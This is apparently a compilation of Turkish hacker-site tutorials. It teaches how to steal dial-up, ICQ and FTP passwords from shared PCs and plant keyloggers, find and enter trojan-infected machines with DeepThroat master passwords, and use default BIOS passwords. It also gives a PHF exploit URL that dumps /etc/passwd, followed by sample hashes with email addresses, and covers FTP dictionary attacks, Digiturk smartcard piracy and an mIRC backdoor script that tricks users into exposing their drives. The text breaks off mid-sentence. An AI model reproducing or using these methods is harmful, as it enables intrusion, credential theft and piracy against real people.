HALLET GİBİ SÜPER PROGRAMLAR VASITASIYLA
PWL ICQ VE FTP ŞİFRELERİNİ ELE GEÇİRME
GEREKLİ
PROGRAMLAR:
HALLET PROGRAMI
PWL TOOL
PROGRAMI ICQCRACK PROGRAMI Evet arkadaşlar daha
önce manuel olarak pwl ve ıcq şifrelerinin nasıl ele geçirileceğini
anlatmıştık. Manuel yöntemle öğrenmek çok önemliydi. Çünkü hack
olayında ezbere iş yapmak pek iyi değildir olayın mantığını kavramak
önemli. PROGRAMLARI NASIL KULLANIRIZ. HALLET PROGRAMI:
Öncelikle ayarlar bölümünde kaynak paylaşım c olarak
kalacak hedef dizin pwl dosyalarının bilgisayarımıza
kopyalanacağı adres örnek c dizininde klasör oluşturalım ve adını
pwller koyalım. HEDEF DİZİN: c:\pwller olacaktır. bu porgramın
dosya gönderdiğini ben görmedim sanırım o bölümünde sorun var ama
genede yazmak isterseniz göndermek istediğiniz bir dosya ismi
yazabilirsiniz veya aynen kalabilir ayarlarımızı
yaptık TARAYICI MODUNA GELİYORUZ VE BİR İP ARALIĞI
YAZIYORUZ ÇOK BÜYÜK ARALIKLAR VERMEYİN BİLGİSAYARI
KİLİTLEYEBİLİYOR EN FAZLA 15 İP ARALIĞINDA KALSIN PORT KISMINI
1243 YAZABİLECEĞİMİZ GİBİ
139 DA
YAZABİLİRİZ. YAPILACAK İŞLEMLER BÖLÜMÜNDE HEPSİNİ
İŞARETLİYORUZ VE İŞLEMİ BAŞLATA BASIYORUZ çok kısa bir zaman
dilimi içinde share kullanıma açık bilgisayarlardan bir sürü pwl ıcq
nadirde olsa ftp şifrelerini tespit ediyor ve belirlediğimiz klasöre
kaydediyor. HALLET: Hallet Programı için Rx3 programı vasıtasıylo
eğer programınız elinizde yoksa indir: download bölümünde .
Belirli bir aralığı taratarak share bilgisayarları tespit ediyoruz
ve hallet programınının ip bölümüne giriyoruz. keylogger
göndermek isteniyorsa keylogger göndere basıyoruz keylogger
gönderiyor keyloger txt indir dediğimiz zaman gönderdiğimiz
keyloggerleri okuyor yanlız karşı pcnin yazmaya ve silmeye karşı
güvenliği olmaması gerekir.Hallet programının en önemli
özelliklerinden biri dizin görüntüleyle karşı pcye seri bir biçimde
dalması yani bilgisayara girer. PWL İNDİR: Çok kısa bir zaman
içinde bütün pwl leri bulur ve ve kendi klasörüne ip numaralarına
göre kopyalar halletin bu özelliği mükemmel. Bulamazsa sesli mesaj
verir bulurken daha değişik sesli mesaj verir FTP indir:karşı
pcde varsa ftp şifserelerini bulur ve kopyalar. İKİ ADET
MÜTHİŞ PROGRAM ŞİFRELERİ PROGRAMLAR KAYDETTİ NASIL
AÇACAĞIZ pwl şifrelerinin üzerine iki kez tıklarsak pwl tool
programı hemen önümüze geliyor searchPasswordFast butonuna basıyoruz
hoop bütün şifreler önümüzde. Bu kadar basit.
PEKİ ICQ
ŞİFRELERİNİ NASI AÇACAĞIZ ICQcrack porogramını açıyoruz.En
soldaki buton openICQ dadabase ye basıyoruz ıcg şifrelirini c:\pwl
ler dosyasına kaydetmiştik hemen c yi arattırıp o dosyayı buluyoruz
karşımıza open file geldi open feledeki ICQ numarasının üzerine
tıklıyoruz aç diyoruz hooppppp ICQ ŞİFRESİ HATTA VE HATTA
KULLANDIĞI VERSİYONU KARŞIMIZDA evet arkadaşlar bu programlar
vasıtasıyla dial up ve ıcq şifre elde etmek çok kolay ve kısa bir
zaman içinde yüzlerce pwl ve ıcq şifreleri elde
edebilirsiniz. KOLAY
GELSİN
SUPER SCAN PROGRAMI
KULLANIMI SUPERSCAN İNDİR download bölümünde Hostname
Lakup:Buraya hangi ip aralığını taramak istiyorsak sadece bir
tane ip numarası giriyoruz. Lakup a tıklıyoruz bilgisayarın hostu
bağlantı adresi çıkıyor yazdığımız ip o an nette değilse herhangi
bir şey yazmıyor. 1-255 ip aralığı tarattırmak istiyorsak.ip
kısmının altında 1..254 butonuna tıklıyoruz. diyelimki aynı
anda schoolbus-Sub7-Netbus pro trojanlarını taratmak
istiyoruz. Port List Setup butonuna basıyoruz Port List File
kısmından trojanı seçiyoruz.Evet trojan listesi önümüze geldi ve
birçok sayıda trojan ama biz bunların hepsini taratmak istemiyoruz
hepsini taratmaya kalkarsak çok zaman alır. Clear All butonuna
basıyoruz trojanların yanındaki işaretlerin hepsi kalktı Schoolbusu
taratmak için 54321 portu sub7 için 27374 ü Netbus pro için 20034
ü işaretliyoruz ben üç tane trojan seçtim siz sadece Schoolbusu veya
subu veya istediğinizi seçebilirsiniz.Seçtikten sonra OK butonuna
basıyoruz evet hayır geliyor hayırı işaretliyoruz.Tekrar ana
sayfaya döndük.Starta basıyoruz. O ip aralığını seri bir biçimde
tarıyor Active host kısmı o ip aralığında aktif nete bağlı
durumdaki pclerin sayısını gösteriyor Open ports ise bize gerekli
olan kısım yani aradığımız torojanların o ip aralığında kaç adet
olduğunu gösteriyor.Yanlarında artı olanlar trojanlı pc ler.
artılara teker teker basabileceğimiz gibi scan işleminin bittiken
sonra da tıklayabilirir. Hiç tavsiye etmem Scan işleminin
bitmesini bekleyin ip arama bitince diyelimki 195.175.101.1
/ 195.175.249.255 gibi büyük bir ip aralığı tarattınız
önünüze tahminimce en az 5000 civarı aktif pc çıkacak yani tahminen
5000 civarında aktif pc içinde trojan arayacak bulabileceği trojan
sayısı o andaki duruma göre 20 olur 5 olur hiç olmaz 30 olur her
neyse tarama bittikten sonra Expand all butonuna basıyoruz
yanında + işaretli yani aradığımız trojanlı pcler açılıyor. Daha
sonra Prune butonuna basıyoruz ekranda sadece aradığımız trojanlar
kalıyor diğer binlerce işimize yaramayan pc listesi kayboluyor ve
trojanlı ipleri teker teker clinte giriyoruz.Sadece 1-255 aralığı
taratacaksak yukarıya her seferinde ip numarası yazmaya hiç gerek
yok PrevC Geriye doğru 1-255 aralık arama NextC ileriye doğru 1-255
ip aralığı tarama bu butonlara basmanız yeterli. Eğer çok büyük ip
aralığı tarayacaksak Starta başlangıç ip no elle giriyoruz.Stop a
bitiş ip no yine elle giriyoruz. Çok kısa bir zaman dilimi içinde
kaç tane trojan bulmak isterseniz binlerce pc yi tarayarak önümüze
getiriyor. Evet en kullanışlı en seri şu anda emsali olmayan
ücretsiz Super Scan ın sadece trojan bölümü için anlatılması gereken
kısmı bu. All ports from la tüm açık portları taratabilirsiniz.
Tüm açık portları çok kısa zamanda bulur telnetten bağlanır.Daha
birçok özelliği mevcuttur. Bizim için gerekli olan kısımlarını dilim
döndüğünce
BiOS Şifreleri
ve BiOS Şifresi Kırmak :
BIOS Şifrelerini
konusunu biraz araştıracak olursak.. bilmeyenler için Kırılması en
zor şifrelerden biridir..
Öncelikle
bilmeyenler için söyleyim BIOS Password bilgisayarınız henüz açılma
aşamasındayken karşınıza çıkan şifredir. Peki bundan nasıl
kurtulacaksınız. Çok kolay.. ama gizli bir iş için yapacaksanız
mesela hırsızlık falan.. zaman alacaktır.. önce kasayı açmanız
gerekecek daha sonra BIOS pilini kasadan 5dk lığına çekin..
bilgisayarı 5dk sonra çalıştırdığınızda BIOS şifresi sormayacaktır.
Yada bazı Boardların BIOSlarındaki özel Jumperlardan
yararlanabilirsiniz. Ancak bazende BIOS passwordların Board`un ilk
kullanıldığı gibi kalır.. Bilgisayar sahibi şifreyi bildiği için
değiştirmez yada değiştirmeyi bilmediği için denemez.. Peki bunların
şifreleri nelerdir.
Bu şifreler
BIOSun türüne göre değişir ben bazılarını en sık üretilenler
sırasına göre verim
AWARD
BIOS
alfaromeo AW AWARD AWARD_PS AWARD_PW AWARD_HW AWARD_SW AWARD
PW AWARD
SW _award awkward j64 j256 j262 j322 01322222 589589 589721 HLT SER SKY_FOX Syxz aLLy CONCAT TTPTHA aPAf HLT KDD ZBAAACA ZAAADA ZJAAADC djonet
|
AMI
BIOS:
AMI ami bios setup cmos AMIDECODE A.M.I. AMI
SW AMI_SW BIOS PASSWORD HEWITT
RAND Oder A.M.I. AMI!SW AMI?SW HEWITT
RAND alfarome efmukl ( işte schoolbusın şifreside burdan
çalınmıştır. )
Phoenix: phoenix
Compaq: compaq
Tinys: Tiny |
Bazı Diğer BIOS
Şifreleri:
LKWPETER lkwpeter BIOSTAR biostar BIOSSTAR biosstar ALFAROME Syxz Wodj PASS PASSOFF CONDO J64 BIOS SETUP CMOS admin system
|
Cgi Açiklarla Site
Hacklemek |
Web
sitelerini CGI açýklarýndan faydalanarak kýrmanýn iki yolu
vardýr. 1.
Yol:
Bilindik CGI'larý browser'ýmýzýn adres satýrýna yazarak manuel
olarak ararýz. Bilindik CGI ve diðer script açýklarý þöyle:
aglimpse
> /cgi-bin/aglimpse AnyForm2 >
/cgi-bin/AnyForm2 args.bat >
/cgi-dos/args.bat AT-admin >
/cgi-bin/AT-admin.cgi bnbform.cgi >
/cgi-bin/bnbform.cgi campas >
/cgi-bin/campas carbo.dll > /carbo.dll CGImail.exe
> /scripts/CGImail.exe cgiwrap >
/cgi-bin/cgiwrap classifieds.cgi >
/cgi-bin/classifieds.cgi Count.cgi >
/cgi-bin/Count.cgi displayopenedfile.cfm >
/cfdocs/expelval/displayopenedfile.cfm docs/codebrws.asp
> /iissamples/sdk/asp/docs/codebrws.asp edit.pl >
/cgi-bin/edit.pl environ.cgi >
/cgi-bin/environ.cgi exprcalc.cfm >
/cfdocs/expelval/exprcalc.cfm Fax Survey >
/cgi-bin/faxsurvey filemail.pl >
/cgi-bin/filemail.pl files.pl >
/cgi-bin/files.pl Finger >
/cgi-bin/finger fpcount.exe >
/scripts/fpcount.exe glimpse >
/cgi-bin/glimpse guestbook.cgi >
/cgi-bin/guestbook.cgi Handler >
/cgi-bin/handler howitworks/codebrws.asp >
/iissamples/exair/howitworks/codebrws.asp HTML Script >
/cgi-bin/htmlscript HTIMAGE >
cgi-bin/htimage.exe info2www >
/cgi-bin/info2www issadmin/bir.htr >
/scripts/issadmin/bdir.htr jj >
/cgi-bin/jj maillist.pl > /cgi-bin/maillist.pl man.sh
> /cgi-bin/man.sh newdsn.exe >
/scripts/tools/newdsn.exe nph-publish >
/cgi-bin/nph-publish nph-test-cgi >
/cgi-bin/nph-test-cgi openfile.cfm >
/cfdocs/expelval/openfile.cfm perl.exe >
/cgi-bin/perl.exe perlshop.cgi >
/cgi-bin/perlshop.cgi PF Display >
/cgi-bin/pfdispaly.cgi PHF > /cgi-bin/phf PHP >
/cgi-bin/php.cgi rguest.exe >
/cgi-bin/rguest.exe search97.vts >
/search97.vts sendmail.cfm >
/cfdocs/expelval/sendmail.cfm showcode.asp >
/msads/Samples/SELECTOR/showcode.asp survey.cgi >
/cgi-bin/survey.cgi Test-CGI >
/cgi-bin/test-cgi textcounter.pl >
/cgi-bin/textcounter.pl THC - Backdoor >
/cgi-bin/rwwwshell.pl uploader.exe >
/cgi-win/uploader.exe view-source >
/cgi-bin/view-source view-source >
/cgi-bin/view-source VTI BIN [shtml.dll] >
/_vti_bin/shtml.dll VTI BIN [shtml.exe] >
/_vti_bin/shtml.exe VTI INF [_vti_inf.html] >
/_vti_inf.html VTI PVT [administrators.pwd] >
/_vti_pvt/administrators.pwd VTI PVT [authors.pwd] >
/_vti_pvt/authors.pwd VTI PVT [service.pwd] >
/_vti_pvt/service.pwd VTI PVT [users.pwd] >
/_vti_pvt/users.pwd Web Sendmail >
/cgi-bin/websendmail webdist.cgi >
/cgi-bin/webdist.cgi WebGais >
/cgi-bin/webgais wguest.exe >
/cgi-bin/wguest.exe wrap > /cgi-bin/wrap www-sql >
/cgi-bin/www-sql wwwboard.pl >
/cgi-bin/wwwboard.pl
2.
Yol: Manuel
olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI
Scanner kullanabiliriz.
Not:
CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran
exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan
birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz:
http://www.mit.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd yazarýz
(adres örnek olarak yazýlmýþtýr. Herhangi bir art niyet
yoktur;o)) Tabii çýkan dosya etc içindeki username ve
password'lerin olduðu password dosyasý olacaktýr. Þu
þekilde:
slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/slasher:/bin/bash\par mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/home/mcgreen:/bin/bash\par abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,,:/home/abi98:/bin/bash\par henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henner_:/bin/bash\par
Çýkan
password'larý bir password cracker ile kýrabilirsiniz (John
The Ripper tavsiye edilir.) Manuel olarak veya bir program
yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne
yapacaðýz? http://www.mit.gov.tr/_vti_pvt/services.pwd yazarýz. Ýþte
bir de PHP CGI
örneði: http://www.mit.gov.tr/cgi-bin/php.cgi?../../../etc/passwd Bu
örneklere bakarak olayýn mantýðýný biraz da olsa
kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup
veya yazýp çalýþtýrmanýz gerek.
Bu
da size kalmýþ...
Not:
Adý geçen dosyalar Files bölümünde.
|
Unsecure Programi ile Site
Hack |
Site
kýrmak için öncelikle UnSecuare denilen bir programa
ihtiyacýnýz var. Bu programýda Programlar Bölümünden
bulabilirsiniz. Programý çalýþtýrýnca karþýnýza gelen yerde
neler yapmanýz gerektiðini yazacam þimdi.
Computer
name or Ip: Buraya Kýrmak istediðiniz sitenin Ip numarasýný
yazmalýsýnýz. Bilmiyorsanýz, Cute Ftp ile baðlanýn Ipsini
baðlanýrken göreceksiniz.
Port:
buraya kýrmak istediðiniz sitenin portunu yazýn genellikle 21
oluyor. Siz 21 olarak býrakýn.
Current
password: Buraya dokunmayým, Username: Bu bölüme sitenin
kullanýcý adýný yazýn, bilmiyorsanýz Ip numarasýna finger
çekin görürsünüz.
Dictionary
File: Burasý kilit nokta buraya denenecek olan þifreleri
barýndýran dosyanýn adýný yazýn. Bu tür dosyalar oluþturmak
için Sibob denilen bir program var. Programlar bölümünde
bulabilirsiniz.
Attack
Options bölümünde yapacaðýnýz deðiþikler: Dictionary attack ve
reconnect on disconnect tuþlarýný seçin diðerlerini seçili
býrakmayýn.
Brute
force attack: Bu bölümde hiçbirþeyi seçili
býrakmayýn.
Diðer
kalan bölümlere hiç dokunmayýn ve connect tuþuna basýn
þifreleri denemeye baþlar. Biraz uzun sürer ama site kýrmanýn
en emin yoludur. Þifreyi bulursa current password bölümünde
görürsünüz. |
DeepThroat v3.1 ile bilgisayara nasil girilir? --------------------------------------------------------------------- DT v3.1 Client.exe programini çalistirdiktan sonra açilan program penceresinin üst tarafindaki ip bölümüne 127.0.0.1 yazin ping butonunu tiklayin. Bu islemi yapmamizdaki amaç server programinin kendi bilgisayarimizda açik olup olmadigini kontrol etmek içindir. Unutmayin her herseyden önce kendinizi güvence altina alin daha sonra baskalarinin bilgisayarlarina girmeye kalkin. Eger bunu umursamazsaniz ava giderken avlanirsiniz. Neyse bu islemi yaptiktan sonra DeepThroat monütöründe serverin açik olup olmadigini görecekseniz. Server açik degilse: Pinging 127.0.0.1 Server açik ise : Pinging 127.0.0.1 127.0.0.1: Ahhhh My Mount Is Open (v3.1) Serverenizin açik oldugunu görürseniz telesa kapilmayin. Hemen Server Conf bölünden Main Config bölüne gelin ve Kill server butonunu tiklayin. Bu islem sonucunda server kaldirilacaktir. Server'in kaldirilip kaldirilmadigini tekrar pingleyerek ögrenebilirsiniz.. Ön bilgi olarak bu güvenlik kontrolünü ögrendikten sonra gelelim baskasinin bilgisayarina nasil girecegiz sorusunun cevabina: Ilk önce kendinize bir servis saglayicisi ip'si bulaniz lazim. Örnegin superonline ip'sini kullanalim. ip numaramiz 212.253.152.52 olsun. Bu ip numarsini Scanner bölümüne ip yerine 212.253.152.52 yaziyoruz. Daha sonra yukaridaki seçeneklerden ortadaki seçenegi seçiyoruz (Class C. e.g. 127.1.*.*). Son olarak Scan Ip Range butonunu tikliyoruz ve bekliyoruz. Eger serverin açik oldugu bir bilgisayara raslanirsa yan tarafta o bilgisayarin ip numarasi yazacaktir. Örnegin: 212.253.100.10 ip numarasini göstersin. Bu ip numarasini alip ana penceredeki ip bölümüne yazip pingliyoruz. Bu islem sonucunda eger server sifreli degilse direkt o bilgisayar baglanacaksiniz. Eger server sifreli ise ekranda Password Required, Please Identify! yazacaktir. Bunu üzerine eger sifreyi bilmiyorsaniz. Yapaniz gereken çok basit. Sifre bölümüne server türüne göre asagidaki master password'lerinden birini yazniz. Bu sifreler genel kirici sifredir. Yani serverin sifresi ne olursa olsun bu sifreyi yazdiginiz zaman server sifresini kirmis olursunuz. DeepThroat'in Masterpasswordlari: v2.1 server için:whothefuckdoyouthinkiamgoddamnit1 v3.* server için:whothefuckdoyouthinkiamgoddamnit3 Secure-v3.1 server için:coldhasquit Server sifresini kirdiktan sonra artik kurbanin bilgisayarini kapilari size açilir ve istediginizi yapabilirsiniz. Son olarak bilgisayarin dosyalarina nasil erisebileceginizden bahsedeyim. Bunun için FTP Client bölümüne girin. Buradan Connect butonunu tiklayin. Karsiniza çikan yeni pencereden Dis/Enable FTP butonunu tiklayin ve sonrada connect butonunu tiklayin. Artik kurbanin bütün dosyalari karsiniza gelecektir. Hadi kolay gelsin. Bu programi en iyi sekilde ögrenmek için internete bagli olmadigniz bir zamnda server programini çalistirin ve kendi kendinizin bilgisayarniza girin. Böylece hangi butonun ne ise yaradigni ögrenmeniz daha rahat olacak. Bu islem sonucunda server'i kaldirmayi unutmayin. Bu arada server.exe'yi çalistirdiginiz zaman kendini C:\Windows\systray.exe olarak kopyalar.
Digitürk Hack
Meşhuuur digitürk ü nasıl beleş
izlersiniz...... açıklama:cw cryptowork anlamına gelir ve
digitürk ün kullandığı
şifreleme sistemidir::::::::::::::::::::::::: 1. Cw Hakında
genel Bilgiler 2. Gereken Malzemeler 3. Original Kartı doğru
okutmak 4. DT Kartına yeni Paket eklemek 5. DT Kartından
tarihi geçmiş Paketleri silmek 6. INS ve Nanolar 7.
Salonlar 8. Log yapmak 9. Cripto2001 INS Bölümü 10. Diğer
INS ve Nanolar
1. Cryptoworks hakında genel
bilgiler :
Öncelikle sunu belirteyim,bu
FAQ`ı yazma sebebim kesinlikle yasal Abo yapabileceğiniz bir
ülkede adı geçen Provideri ücretsiz seyredebilmeniz
için değil.Amacim sadece bir yayın sifreleme systemi olan
Cryptoworks systemini ve bir Smartkart ile yapılabilinecek
imkanları araştırmak.Kartınıza veya herhangi bir cihazıniza
gelecek olan zarardan sorumlu değilim.Cryptoworks yayın
şifreleme systemi şu ana kadar tam olarak çözülmüş değil.Yayını
açmak için kulanılan bu yöntemler benim kanatıma göre uzun vadeli
bir yöntem değil,onun dışında Cryptoworksun Algorytmü halen
çözülmüş değil.Signaturun bugünkü programlar tarafından hesaplama
yerine „timen“ yapmasınında tek sebebi budur.Üzerine basarak
söylüyorum Cw-Algosu bilinmediği veya puplic olmadığı sürece hic
bir Goldwafer kartının çalışma ihtimali dahi yok.
2. Gereken
Malzemeler:
1. Original DT-Kartı 2.
Kartın Bitmap bilgilerini okutmak için CW-Reader veya Winexplorer
4.4 3. Karta elde edilen bilgileri yazabilmek için
Cripto2001 4. Phönix Kart Programlayıcısı (MasterCRD,Multiprog
v.s) 5. Log için Seasson2-Interface
3. Original Kartı doğru
okutmak:
Bu işlem için iki ihtimal
var.Birincisi ve daha kolay olani ,CW-Reader programinin yardimi
ile Karti reactive etmek için tüm gereken
bilgilere ulaşmak.Genelde CW-Reader programi kulanildigi için
anlatimimi bu Programa göre yapacagim.Ikinci ihtimal ise
Winexplorer 4.4 ile Karti tam detaili bir şekilde bir script
araciyla okutmak.Bu yöntem konu hakinda daha fazla bilgi
edinmek isteyen Arkadaşlar için daha uygun olani.CW-Reader
aslinda kendi kendini anlatan bir program,yinede kisa olarak
anlatmaya calişayim.CW-Readeri acip Prgrammerinizin PC`ye bagli
oldugu COM portunu seçtikten sonra “Read Card“ tusuna basarak
kartinizi okutuyorsunuz,eger okumayipta hata
veriyorsa „Configuration“ Menüsünden „ResponceDelay“ değerlerini
değiştirip tekrar deneyin Kartı hatasız okuyana kadar.Bendeki
çalışan ve standart „ResponceDelay“ değeri „150“.Şimdi bize karti
açmak için lazim olan bilgiler şunlar:
CHID,Status,Version,Baslangıç ve
Bitiş tarihi ve Chanel Bitmap.
Paketin ismi o kadar önemli bir
Nokta değil,buraya kendi adınızı dahi yazabilirsiniz hiç birşey
değişmez.Eğer kartınızı başarı ile okutmayı tamamladıysanız diğer
işlemlerle devam edelim.......
4. DT Kartına yeni Paket
eklemek:
Öncelikle aşagida vermiş oldugum
DT-Verileri örnek verilerdir,yani şu an çalişmayanlar.Yeni
velileri kendiniz temin etmeniz gerekir. Cripto2001 V8 veya daha
büyük programını açıp yine COM-Port gibi ayarları yaptıktan sonra
kartınızı okutun.Kart`dan okutuğumuz ve başka bir kart`da
yazmak için kulanacağımız bilgiler diyelimki sunlar.
ProviderID: C0 Status:
20 CHID: 0D EF Version: 00 00 00 71 Baslangic Tarihi :
01.01.2001 Bitis Tarihi : 01.01.2010 Ch Bitmap: 00 00 00 00 00
00 00 00 00 00 00 01 FF FE 00 00 00 00 00 00 0F FF FF FF FF FF FF
FF FF FF FF FF
Şimdi Cripto2001`in „Kayit“
Bölümünden „Aktiv Et“ seçeneğini seçin, bunu yaptıktan sonra
karşınızda aşağıdaki Pencereyi göreceksiniz.Elinizdeki
verileri aynen Resimde gördüğünüz gibi programa geçtikten sonra
„Yazılacak olan Kanaları seç“ yazan yerden 1. kutucuğu
işaretleyin,sonra „Karta Yaz “ tuşuna basarak signaturu aratmaya
baslatin.Signatur arama işlemi biter bitmez ACK yazan yerde 90 00
yazmasi gerek ve yeni Packetiniz kartinza geçmiş durumdadir eger
yanliş birşey yapmadiysaniz.
5. DT Kartından Tarihi
geçmiş Paketleri silmek:
Bu sefer „Deaktivate“ bölümüne
geciyoruz.bugüne kadar elde edinmiş bilgilere göre Statusu A0
olanlar haric tüm packetler Kartdan
tekrar silinebiliyor.Asagidaki örnekte yukaridaki örnek ile ayni
olsun diye ben „20“ kulandim.Burda yine iki seçeneginiz var,ya
tarihe göre sileçeksiniz yada CHID`ye göre.Eger tarihe göre
silmek istiyorsaniz „Paket sil (Tarih üzerinden)“ yazan Bölümü
Kulanacaksınız,buraya sadece ProvID ve Tarihi verdikten
sonra,vermis oldugunuz tarihden eski olan tüm Paketler
silinir.DIKKAT: Silme işi aynı anda değil,yani teker teker
siliyor program ve her seferinde Signatur arayacaktır.Ikinci
seçeneginiz ,aşağıdaki seçeneği kulanarak Paketi CHID üzerinden
silmek,bu daha sağlıklı olan seçenektir bana göre.Buraya`da
yine ProvID,Status ve CHID gibi verileri girdikten sonra
Signaturu aratmaya baslatıyorsunuz.
6. INS ve Nanolar:
Evet şimdi geldik işin en ilgi
çeken yanina.Burda şimdi bazi INS + Nanolari ve bunlari nasil
kulanacaginizi anlatmaya çalişacagim.Bunun için original
Loglardan alinti kulandim.
Ne gibi INS`ler var ve INS nedir
? INS yani Instruction bir komut anlamını taşır ve A4`ün hemen
yanında gelir
à A4 42 00 00 20 42 =
INS 20 = Bundan sonraki gelecek olan byte`larin sayısı
(Hexdezimal olarak burda 32 Bytes)
1. Smartkartından verileri
okuma 2. Smartkartına yeni veri yazma ve silme 3. PIN
Kontrolü 4. PIN degistirme 5. ve burda saymadığım daha bir çok
INS bulunmaktadır.
Şimdi yukaridaki 42`nin yerine
gelebilecek bazı Örnekler:
Insruktion 42 = Tek bir Kart
icin okuma ve yazmak Insruktion 48 = Belirli bir Kart grubunu
okuma ve yazmak Insruktion 22 = PIN Kontrol Insruktion 24 =
PIN degistir Insruktion 26 = PIN`i Kapat Insruktion 4C =
Sormak Insruktion C0 = Cevap almak Insruktion A2 =
Aramak Insruktion A4 = File seçmek Insruktion B0 = Binary
okumak Insruktion B2 = Bilgi ve Kayıtları okumak Insruktion B8
= Serial numarasını okumak
Bir Paket silinirken veya
yazılırken genelde ya „42“ yada (eğer birçok Karta yapılacaksa
islem) „48“ INS`i kulanılmakta.
NANO`lar :
Nanolar hakında bilinmesi
gerekenler.Her Nano 1 byte`dır,hemen yanındaki ikinci byte`i
Nanonun uzunlugunu belirler.Örnek vermek gerekirse söyle: Nano 80
Kartı Hex serial üzerinden Kontakt eder, Nano 80`den hemen sonra
gelen 05 ise Hex serialın uzunlugunu belirler yani burda 5
byte. Asağıdaki saydığım Nanolar sadece kanatıma göre önemli olan
Nanolar,saymadıgım bilinen ve Bilinmeyen daha cok Nanolar var
olmaktadır.
80 05 à Hex Serial /5
Bytes 80 04 à Hex Serial /4 Bytes (Belirli Kart Grubuna Komut
göndermek için) 83 01 à Provider ID/ 1Bytes 8C 03à Status /
Chid : 3 Bytes (Burda ilk byte Status sonraki iki byte CHID) 8D
04à Baslangiç Tarih / Bitis Tarih/ (Burda ilk 2 byte Baslangiç
ikinci 2 byte Bitiş) 92 20 à Kanal Bitmapı / 32 Bytes DF
08à Signatur / 8 Bytes C5 01à Kulanılan Key indexi /1
Bytes DB10à Providerin resmi cözmesi için Karta gönderdiği 2x 8
Bytes %F
Mirc
Üzerinden Bilgisayara Girilebilir ::
Bugüne kadar remote bir
bilgisayara girmek için birsürü yol öğrendiniz. Trojanlar,
NetBIOSlar, Ağ tanıtımları, Telnet vs.. vs.. Ama Internetin bukadar
yaygınlaşmasında büyük rol oynayan mIRC ile bunu yapabileceğinizin
aklınıza geldiğini sanmıyorum..
Şimdi
size lafı fazla uzatmadan kısa bir döküman
okutacağım..
Öncelikle
bu yöntemin çok az kişi tarafından bilindiğini söyleyebilirim.. Bu
nedenle işinizi fazla çaktırmadan yapınki.. bu yöntemde diğerleri
gibi herkesin eline düşüp telef olmasın..
Bu
yöntemle karşı taraftan dosya aktarımı yapabilirsiniz. Ancak dosya
silemezsiniz. Fakat bizim işimizede yarayacak olan *.pwl dosyaları.
tabi sizin kişisel istekeriniz varsa onlarıda download etmeniz
mümkün.
Şimdi
karşı taraftaki muhabbet ettiğiniz kişiye
//fserve nikiniz
magtext rootdirectory welcomefile
Bu
komutta yerine oturan şeyleri yazdırmanız gerekir. Bunları biraz
açıklayacak olursam.
Nickname: Sizin nickiniz Magtext: Aynı anda kaç
dosya çekebileceğinizi belirten bölümdür. Root Directory:
Karşı tarafın bilgisayarında erişeceğiniz dizini belirtir. Mesela
"C:\WINDOWS\"
gibi... Welcome File: Bu son derece gereksiz. Ama böyle bir
parametrede var ve bende bunu açıkayim dedim. Buda siz PCye
eriştiğiniz zaman sizi karşılayacak text
dosyasıdır.
Şimdi
komutu bir örnekle açıklayalım.. Mesela bilgisayarına girmek
istediğimiz kişinin nicki "Yanliz_Ve_Mutlu" olsun bizim nickimizde
Virus "Yanliz_Ve_Mutlu" Kullanıcısına şu komutu yazdırmayı
başarmanız gerekir.
//Fserve Virus 10
C:\WINDOWS\
TRhc.txt
Şimdi burda
"Yanliz_Ve_Mutlu" Virus nickinin C:\WINDOWS\
dizinine girmesine izin veriyor. Ve dizinden 10 dosya download
edebilmesine izin veriyor. Böylece Virus nickine sahip
kullanıcının *.PWL dosyalarına erişebilmesinide sağlamış
oluyor.
Evet
buraya kadar kullanıcıya yazdırmanız gereken komutu anlattım..
Şimdide bunu Script yazarları için bir nevi server dosyası haline
dönüştürmek için gerekli komutlara bakalım.. Hatırlarsanız eskiden
Dragon ve Solucan scriptlerde basit bir "Remote Control" sistemi
vardı. Sizde daha gelişmiş birşeyler
yazabilirsiniz.
ON
1:TEXT:*TurkHackerCenter:?: { if ($nick == Virus) {
/fserve virus 10 C:\ debug.txt | /close -m virus } else
HALTDEF }
Yukardaki
komutta gördüğünüz şeyin açıklaması şudur. Siz Virus nickine
sahipsiniz ve sizin scriptinizi kullanan bir kullanıcı var onun
bilgisayarına erişmek için ona "TurkHackerCenter" yazısını
gönderiyorsunuz. Sonrada o size C:\ dizini için giriş veriyor. Tabi
sizin pencerenizi hemen kapatıyor ve şifrenin kullanıcının eline
geçmesini engelleiyor. Böylece sizde sadece kendinize özel bir
sistemin güvenliğini sağlamış oluyorsunuz. Tabi en en kolay komutu
verdim. Bunu geliştirip kişisel uyarlamalarla daha güvenli hale
falan getirmenizde mümkün..
Yanlız unutmayınki.. Kurbanın sizin girmenize izin
verdiği dizinden daha alt dizinlere geçemezsiniz. Fakat daha
yukarılara çıkabilirsiniz. Bunu bir örnekle açıklayacak olursam
şöyle anlatabilirim. Mesela Kullanıcı size "/fserve virus 10
C:\WINDOWS\ debug.txt" komutuNU Kullanarak geçiş verdi. Bu komuttan
sonra C:\WINDOWS\System32
dizinine geçebilirsiniz. ama C:\ dizinine
inemezsiniz.
Ayrıca
dizin değiştirmek dosyaları download etmek için bazı komutlar var
onlarda şöyle..
CD
"Directory": Dizin değiştirmenizi sağlayan komut Exit:
Çıkış Get "filename": Dosyaları indirmek için kullanılır.
(Uzantısıyla birlikte yazılır) Help: Yardım Ls: Dizindeki
dosyaları listeler.
Bundan
sonrası size kalmış dizin değiştirip *.PWL dosyalarını kendi
bilgisayarınıza aktarın sonrada PWL Crackerlarla kırın ve
istediğiniz şifreyi alın.. Hatta size PWL Şifrelerini çözmek için
PWL Toolr programınıda tavsiye edebilirim.
Hadi
size kolay gelsin.....
R3X Kullanımı (Trojansiz Bilgisayara Girmek İçin)
Gerekli
Olan Programlar DOWNLOD BÖLÜMÜNDE
1-R3x(445
kb)
2-Hallet(257 kb)
3-Icqrin(295
kb)
4-Repwl(168 kb)
1-Simdi ilk basta tüm dosyalari
download edelim.
2-Evet simdi R3x'i açalim.Çikan uyariya
